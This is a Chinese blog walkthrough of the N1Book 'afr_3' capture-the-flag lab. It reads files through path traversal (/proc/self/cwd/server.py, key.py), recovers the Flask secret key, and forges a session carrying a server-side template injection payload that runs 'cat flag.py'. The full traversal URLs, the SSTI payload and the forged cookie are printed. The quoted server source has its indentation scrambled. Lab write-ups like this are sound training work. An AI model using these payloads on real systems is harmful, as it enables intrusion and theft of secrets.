【文件读取/包含】任意文件读取漏洞 afr_3

最新推荐文章于 2024-10-04 23:51:13 发布
最新推荐文章于 2024-10-04 23:51:13 发布
阅读量198 收藏
点赞数
分类专栏: 文件包含 文件读取 漏洞库 文章标签: 安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wj33333/article/details/134429897
版权

1.1漏洞描述

漏洞名称任意文件读取漏洞 afr_3
漏洞类型文件读取/包含
漏洞等级⭐⭐⭐⭐⭐
漏洞环境docker
攻击方式

1.2漏洞等级

高危

1.3影响版本

暂无

1.4漏洞复现

1.4.1.基础环境

靶场docker
工具BurpSuite

1.4.2.环境搭建

        1.创建docker-compose.yml文件

version: '3.2'

services:
  web:
    image: registry.cn-hangzhou.aliyuncs.com/n1book/web-file-read-3:latest
    ports:
      - 5000:5000
 

         2.将该代码写入文件

启动方式

docker-compose up -d

flag

n1book{afr_1_solved}

关闭

sudo docker-compose down

        3.访问kali 5000端口

 

搭建成功 

1.5深度利用

1.5.1靶机攻略

        1.查看源码

        没有发现有用东西

        2.扫描目录

         根据引导进入article,熟悉的参数出来了,name=aiticle

 3.尝试查看etc/passwd

查看flag

失败了

尝试使用php://fileter 读取

?filepath=php://filter/read=convert.base64-encode/resource=[目标文件] 

也失败了。

看了大神的讲解,我觉得应该能想到,因为现在的信息就是已经可以正常包含/etc/目录下的文件(passwd),那么/proc/目录下的也应该能包含

/proc/
里面含有很多的进程信息,比如/proc/3333,就是进程ID为3333的信息

/proc/self/
这个就很魔幻了,因为进程ID是一直变得,我这里如果填了article=/proc/self/......,那么就是article相关的进程,也就是说这个self是谁用就是谁

cmdline
启动当前进程的完成命令


cwd
当前进程的工作目录

        访问,发现pythonserver.py,这里应该不是pythonserver.py文件,因为cmdline是启动当前进程的完成命令,那执行的命令应该是python server.py 

article?name=../../../../../../proc/self/cmdline

4.通过cwd读取server.py

article?name=../../../../../proc/self/cwd/server.py

 拿到server.py的源码

#!/usr/bin/python
import os
from flask import (Flask, render_template, request, url_for, redirect, session, render_template_string)
from flask_session import Session

app = Flask(__name__)
execfile('flag.py')#execfile() 函数可以用来执行一个文件。
execfile('key.py')
FLAG = flag
app.secret_key = key @ app.route("/n1page", methods=["GET", "POST"])


def n1page():
    if request.method != "POST":
        return redirect(url_for("index"))
    n1code = request.form.get("n1code") or None
    if n1code is not None: n1code = n1code.replace(".", "").replace("_", "").replace("{", "").replace("}", "")
if "n1code" not in session or session['n1code'] is None: session['n1code'] = n1code
template = None
if session[
    'n1code'] is not None: template = '''<h1>N1 Page</h1> <div class="row> <div class="col-md-6 col-md-offset-3 center"> Hello : %s, why you don't look at our <a href='/article?name=article'>article</a>? </div> </div> ''' %
session['n1code']
session['n1code'] = None
return render_template_string(template) @ app.route("/", methods=["GET"])


def index(): return render_template("main.html") @ app.route('/article', methods=['GET'])


def article(): error = 0


if 'name' in request.args:
    page = request.args.get('name') else:
    page = 'article'
if page.find('flag') >= 0: page = 'notallowed.txt'
try:
    template = open('/home/nu11111111l/articles/{}'.format(page)).read() except Exception as e:
    template = e
return render_template('article.html', template=template)
if __name__ == "__main__": app.run(host='0.0.0.0', debug=False)

 

代码中出现了,flag.py和key.py,分别包含一下这俩,在key.py中发现了一段关于key的代码

/article?name=../../../../../proc/self/cwd/flag.py
/article?name=../../../../../proc/self/cwd/key.py

#!/usr/bin/python key = 'Drmhze6EPcv0fN_81Bj-nA'

伪造flask的session,秘钥为Drmhze6EPcv0fN_81Bj-nA

        下载脚本

git clone https://github.com/noraj/flask-session-cookie-manager 

        使用脚本编译 

 sudo python3 ./flask_session_cookie_manager3.py encode -s "Drmhze6EPcv0fN_81Bj-nA" -t "{'n1code': '{{\'\'.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[\'os\'].popen(\'cat flag.py\').read()}}'}"

         拿到伪造flask的session

.eJwdikEKgCAQAL8SXlYvQl2CviKxbGoRmCtZhxD_nnUbZqaI2Ft2XkyiFACNaAPljNjoOBnRDHPDfC-_961IZcb-k3vcr3_cAi8UWjLAGWadOPkowdLVrYE2nR5Q-vTkpKpV1BcrHygP.ZVTSxw.EZGsAPNdMs8G5kxefOpGvPQMXoM

5.使用BP,访问首页抓包

        修改session值为刚刚得到的

拿到flag

 flag = ‘n1book{afr_3_solved}’;

1.6漏洞挖掘

1.6.1指纹信息

1.7修复建议

  • 升级

  • 打补丁

  • 上设备

wj33333
关注
专栏目录
《从0到1:CTFer成长之路》配套题目第一章afr_3
Youth____的博客
12-14 2382
afr_3 这题跟着wp做的,让人头秃 本题考查对linux系统中/proc/目录下文件作用的了解,同时考查了flask模板注入 关于/proc/目录 Linux系统上的/proc目录是一种文件系统,即proc文件系统。与其它常见的文件系统不同的是,/proc是一种伪文件系统(也即虚拟文件系统),存储的是当前内核运行状态的一系列特殊文件,用户可以通过这些文件查看有关系统硬件及当前正在运行进程的信息,甚至可以通过更改其中某些文件来改变内核的运行状态。 /proc/[pid],当查看当前进程的时候可以用/pro
《从0到1:CTFer成长之路》书籍配套题目-[第一章 web入门]任意文件读取漏洞
weixin_46703850的博客
02-23 1563
《从0到1:CTFer成长之路》书籍配套题目,来源网站:[《从0到1:CTFer成长之路》](https://book.nu1l.com/)
《从0到1:CTFer成长之路》afr_3
ZhShy
01-16 1233
文章目录靶场:afr_3知识点解题过程flag:n1book{afr_3_solved} 靶场:afr_3 知识点 /proc目录 flask之ssti模板注入 flask-session-cookie-manager burpsuite抓包 解题过程 检查首页,在输入框随便输入,并根据引导进入下一个页面 查看URL: http://9ba2d619-5c5e-4585-ab9e-9dc74f397e14.node4.buuoj.cn:81/article?name=article 通过
DT高清车牌识别摄像机 任意文件读取
最新发布
iSee857的博客
10-04 398
DT-高清 车牌识别摄像机是一款先进的安防设备,采用高清图像传感器和先进的识别算法,能够精准、快速地识别车牌信息。其高清晰该摄像机结合了智能识别技术,支持实时监宴图像质量确保在各种光照和天气条件下都能准确捕捉车牌信息,而且具备远距离识别能力。测和记录车辆进出情况,适用于停车场管理、交通监控等场景,提高了安全性和管理效率。DT-高清车牌识别摄像机存在目录遍历致任意文件读取漏洞,未经身份验证的远程攻击者可以读取系统内部敏感配置文件,获取服务器信息,导致系统处于极不安全的状态。厂商已发布补丁 请及时修复。
N1Book-第一章Web入门-任意文件读取漏洞-afr_3
weixin_40872714的博客
04-03 1291
N1Book-第一章Web入门-任意文件读取漏洞-afr_3 参考文章: https://blog.csdn.net/AAAAAAAAAAAA66/article/details/121490787 http://elssm.top/2021/11/29/SSTI%E6%A8%A1%E7%89%88%E6%B3%A8%E5%85%A5/ https://www.freebuf.com/articles/web/264088.html
[第一章 web入门]afr_3
2202_75361164的博客
04-04 910
任意文件读取,session伪造+ssti。 可以发现secret_key在key.py,flag在flag.py里面 并且,/n1page路由下面有ssti注入,注入的数据刚好是session
CTF刷题记录Buuctf_N1BOOK——afr_3
m_de_g的博客
06-17 1867
** N1BOOK——afr_3 ** 一、解题思路 1.打开题目发现一个输入框 既然是web题的话,还是先查看页面源代码 就发现使用的是POST的提交方式,没办法,只能看这个框的秘密所在了 2.直接输入1进行查询 页面提示说,你为什么不看我们的文章呢?这里是个出发的按钮,点击 3.又有提示说明,这是一篇示例文章?内心充满了困惑?????? 抬头一看,URL好奇怪 http://80a3f61d-704d-4c38-b615-158bab104673.node3.buuoj.cn/article?
AFR.zip_RP Java_afr 48a_cad java_java cad_them
09-19
A system that takes CAD drawings as input and apply automatic feature recognition methods on them to identify different features present in them. The feature will then populate in a tree in the system...
AFR批量文件查找替换.zip
04-13
AFR通常会提供过滤选项,让用户可以选择特定类型的文件(如只处理文本文件)或者排除某些不包含目标文本的文件。此外,它可能还支持正则表达式,这将使查找和替换功能更为强大,能够处理更复杂的匹配模式。 在执行...
C#人脸识别+虹软AFR_FSDK_Demo_仅供项目实战学习
07-10
使用到的虹软的SDK包中,...AFR_FSDK_FaceInput public struct AFR_FSDK_FaceInput { public MRECT rcFace; public int lOrient; } 这个结构体是FD识别的输出结构体,我们在上一章节标记人脸时使用了此结构体。
怎么将音频原始文件导入matlab,Matlab2019b音频文件读取
weixin_39997194的博客
03-17 5264
Matlab中对音频文件读取操作Matlab中对文件读取操作注意:本程序与2016b版本以前不兼容读取整个音频文件如果你需要读取整个音频文件并输出数组时,可以使用audioread函数[y,Fs] = audioread('C:\Users\Hong\Desktop\matlab\城之内.mp3');读取部分音频文件如果需要读取部分音频,这是将前两秒的数据读取出来,相当于新建了一个2秒的文件,...
i春秋 afr3 任意文件读取 SSTI flask模板注入 session伪造 详细题解
AAAAAAAAAAAA66的博客
11-23 3617
---------------------------------------------------------------------------------------------------------------------------------这道题考察的范围挺广的,对于我这样的新手很不友好,那些知识也不是一时半会就能够学完的, 我也是搞了好几天,才理解思路和相关细节。 但其实对于这道题来说,只需要从那几个知识面中,了解几个'支点'就能做出。 又回到那句话,做题扩充各种知识点,比从0到1
任意文件读取
qq_45953122的博客
08-31 1601
一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是源代码文件,配置文件,敏感文件等等。
任意文件读取与下载漏洞
西电卢本伟的博客
04-07 8939
文件读取漏洞文件下载漏洞文件包含漏洞三者结合,靶场练习
任意文件读取漏洞
m0_57276420的博客
04-08 5924
任意文件读取漏洞(Arbitrary File Read Vulnerability)是指攻击者可以通过web应用程序读取任意文件而不受访问控制限制的漏洞。这种漏洞可能导致敏感信息泄露、系统崩溃等问题。攻击者可以利用任意文件读取漏洞访问服务器上的任意文件,包括密码文件、配置文件等,从而获取系统权限和敏感信息。此外,攻击者还可以利用该漏洞读取应用程序中的敏感数据,如数据库凭据、API密钥等。任意文件读取漏洞通常是由于未正确验证用户输入所导致的。
任意文件读取/下载漏洞
qq_68163788的博客
05-23 3296
任意文件读取/下载漏洞是一种常见的网络安全漏洞,攻击者利用该漏洞可以访问和下载服务器上的任意文件,包括敏感信息、配置文件、数据库文件等。这种漏洞通常由于程序员在编写代码时未正确过滤用户输入导致,攻击者可以通过在输入中插入特定的路径遍历字符(如../)来尝试访问系统上的其他文件。 攻击者利用任意文件读取/下载漏洞可以获取系统重要信息,如用户凭证、敏感数据等,进而造成严重的安全威胁。攻击者可以利用这些信息进行进一步的攻击,或者将其用于勒索、欺诈等恶意活动。
HA_AFR20_gnatix
03-04
快速查找工具HA_AFR20_gnatix
0到1 ctfer :afr_2 :Nginx目录穿越漏洞
Zeker62的博客
08-31 790
参考:https://www.cnblogs.com/yuzly/p/11212078.html Nginx匹配到路径files后,把后面的内容加到/home/的后面,就成了/home/../ 防御方法就是: 在/files后面加/,形成/files/,这样URL访问/files../,home后面就是有两个/,形成/home//../ 或者在home后面加/也可以 打开靶场: 观察到一个目录,...
Web漏洞-任意文件读取漏洞
知世郎
09-01 564
原理:任意文件读取是属于文件操作漏洞的一种,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感文件,正常读取文件没有经过校验或者校验不严格,用户可以控制这个变量或者变量读取任意文件。一般任意文件读取漏洞可以读取配置信息甚至系统重要文件
File Read| file-read| 任意文件读取
薛定谔嘚喵博客
05-05 914
任意文件读取的危害往往大于目录遍历漏洞任意文件读取不仅会泄露网站的结构目录,一些敏感文件还会被通过构造特殊的字符结构下载下来,比如说…任意文件读取是属于文件操作漏洞的一种,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感文件,正常读取文件没有经过校验或者校验不严格,用户可以控制这个变量或者变量读取任意文件。7、读取web应用日志文件,中间件的日志文件,其他程序的日志,系统日志等(可以网站后台地址、api接口、备份、等等敏感信息)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值